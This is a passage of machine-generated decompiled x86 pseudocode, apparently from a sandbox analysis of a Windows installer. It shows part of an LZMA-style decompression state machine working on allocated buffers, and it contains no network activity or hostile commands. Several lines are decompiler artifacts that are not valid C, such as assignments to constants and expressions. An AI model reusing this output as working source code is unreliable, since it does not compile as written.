						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
